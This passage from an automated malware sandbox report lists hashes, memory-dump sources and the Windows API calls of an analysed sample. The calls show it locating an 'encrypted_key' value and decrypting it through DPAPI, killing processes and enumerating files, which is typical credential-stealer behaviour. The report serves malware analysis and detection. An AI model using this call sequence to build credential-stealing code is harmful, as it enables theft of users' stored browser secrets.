                         • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: d40787ce4319c2c06216e3780a1262abdc9eacba541d86e19c7287eb8ca2c2e2
                        • Instruction ID: ef754d0bb1d277df0fb334c6b9dc7d90274c764841ed0ecfaa2f94d100900980
                        • Opcode Fuzzy Hash: d40787ce4319c2c06216e3780a1262abdc9eacba541d86e19c7287eb8ca2c2e2
                        • Instruction Fuzzy Hash: 80411E71D10109AFCB04EFA4D996AFEB778AF95304F108418F41667291EB75AA05CFE1
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009999EC
                          • Part of subcall function 009999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00999A11
                          • Part of subcall function 009999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00999A31
                          • Part of subcall function 009999C0: ReadFile.KERNEL32(000000FF,?,00000000,0099148F,00000000), ref: 00999A5A
                          • Part of subcall function 009999C0: LocalFree.KERNEL32(0099148F), ref: 00999A90
                          • Part of subcall function 009999C0: CloseHandle.KERNEL32(000000FF), ref: 00999A9A
                          • Part of subcall function 009A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009A8E52
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00999D39
                          • Part of subcall function 00999AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00994EEE,00000000,00000000), ref: 00999AEF
                          • Part of subcall function 00999AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00994EEE,00000000,?), ref: 00999B01
                          • Part of subcall function 00999AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00994EEE,00000000,00000000), ref: 00999B2A
                          • Part of subcall function 00999AC0: LocalFree.KERNEL32(?,?,?,?,00994EEE,00000000,?), ref: 00999B3F
                          • Part of subcall function 00999B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00999B84
                          • Part of subcall function 00999B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00999BA3
                          • Part of subcall function 00999B60: LocalFree.KERNEL32(?), ref: 00999BD3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                         • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2100535398-738592651
                        • Opcode ID: e2dffdacac1620dda34f0565c3ef4d87492ad283923a7e44d6e5a3fda08fcfb0
                        • Instruction ID: 072b68c458ffe376a31865d1651f40dc05a5272cdedcb1814d5f4f090b66ea5a
                        • Opcode Fuzzy Hash: e2dffdacac1620dda34f0565c3ef4d87492ad283923a7e44d6e5a3fda08fcfb0
                        • Instruction Fuzzy Hash: 7A313275D10109ABCF04DBE8DD85BEFB7B8AB99304F144519F905A7281E7349A04CBA1
                        APIs
                        • memset.MSVCRT ref: 009A94EB
                          • Part of subcall function 009A8D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,009A951E,00000000), ref: 009A8D5B
                          • Part of subcall function 009A8D50: RtlAllocateHeap.NTDLL(00000000), ref: 009A8D62
                          • Part of subcall function 009A8D50: wsprintfW.USER32 ref: 009A8D78
                        • OpenProcess.KERNEL32(00001001,00000000,?), ref: 009A95AB
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 009A95C9
                        • CloseHandle.KERNEL32(00000000), ref: 009A95D6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                         • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                        • String ID:
                        • API String ID: 3729781310-0
                        • Opcode ID: 5d4a0501fa421a4c5e4504c9cdd0a91f8b32268ef1cd8ce1d2cca90589d7072f
                        • Instruction ID: 206b4cbc4bc709a58dabd9ec71e6f75903cd4bd80dbd02794cd00126b61e1a5d
                        • Opcode Fuzzy Hash: 5d4a0501fa421a4c5e4504c9cdd0a91f8b32268ef1cd8ce1d2cca90589d7072f
                        • Instruction Fuzzy Hash: 1E312D71E012089FDB14DFD0CD59BEDB7B8FB45700F104459F906AB184EB74AA89DB91
                        APIs
                        • CreateFileA.KERNEL32(009A3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,009A3AEE,?), ref: 009A92FC
                        • GetFileSizeEx.KERNEL32(000000FF,009A3AEE), ref: 009A9319
                        • CloseHandle.KERNEL32(000000FF), ref: 009A9327
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                         • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSize
                        • String ID:
                        • API String ID: 1378416451-0
                        • Opcode ID: ef9c8014ae6d1405c9aa1eacc4bed1f8462de01588117bf59661f8a65b10585d
                        • Instruction ID: 95b6b6576cacecb1a1d720325706899d404d78908017dc591e7c7679f6cb67bc
                        • Opcode Fuzzy Hash: ef9c8014ae6d1405c9aa1eacc4bed1f8462de01588117bf59661f8a65b10585d
                        • Instruction Fuzzy Hash: 89F04F35E40208BBDF10DFB0DC59F9EB7B9BB48711F10C694B651A72C0EE749A018B80
                        APIs
                        • __getptd.LIBCMT ref: 009AC74E
                          • Part of subcall function 009ABF9F: __amsg_exit.LIBCMT ref: 009ABFAF
                        • __getptd.LIBCMT ref: 009AC765
                        • __amsg_exit.LIBCMT ref: 009AC773
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 009AC797
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                         • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: be4e2bfd73f720f8b364351e51c06ab86196d7e7304e924bb925daaa2901c7c1
                        • Instruction ID: 76f27502419bf8dace5e37e5ea0bde2ca6681a656a58c4cfb35d6e654ecd0030
                        • Opcode Fuzzy Hash: be4e2bfd73f720f8b364351e51c06ab86196d7e7304e924bb925daaa2901c7c1
                        • Instruction Fuzzy Hash: 2DF09AB29042109FD721BBB89806B8E33A06F82724F244249F404AA2D3CBA459809FD6
                        APIs
                          • Part of subcall function 009A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009A8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 009A4F7A
                        • lstrcat.KERNEL32(?,009B1070), ref: 009A4F97
                        • lstrcat.KERNEL32(?,015B8890), ref: 009A4FAB
                        • lstrcat.KERNEL32(?,009B1074), ref: 009A4FBD
                          • Part of subcall function 009A4910: wsprintfA.USER32 ref: 009A492C
                          • Part of subcall function 009A4910: FindFirstFileA.KERNEL32(?,?), ref: 009A4943
                          • Part of subcall function 009A4910: StrCmpCA.SHLWAPI(?,009B0FDC), ref: 009A4971
                          • Part of subcall function 009A4910: StrCmpCA.SHLWAPI(?,009B0FE0), ref: 009A4987
                          • Part of subcall function 009A4910: FindNextFileA.KERNEL32(000000FF,?), ref: 009A4B7D
                          • Part of subcall function 009A4910: FindClose.KERNEL32(000000FF), ref: 009A4B92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                         • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                        • String ID:
                        • API String ID: 2667927680-0
                        • Opcode ID: 5ef426400649c8580cfa7a57fec95b56d462eb277ddbaf49da73760e763b9447
                        • Instruction ID: 49a2388b9f8dc37a9f875b7ac6210f266a634ac67f8c6e285eb7ebc1a7d1e404
                        • Opcode Fuzzy Hash: 5ef426400649c8580cfa7a57fec95b56d462eb277ddbaf49da73760e763b9447
                        • Instruction Fuzzy Hash: B821C87690020867C754FBB0EC56FEA733CABD5700F404585B64993181FE75AAC8CBD2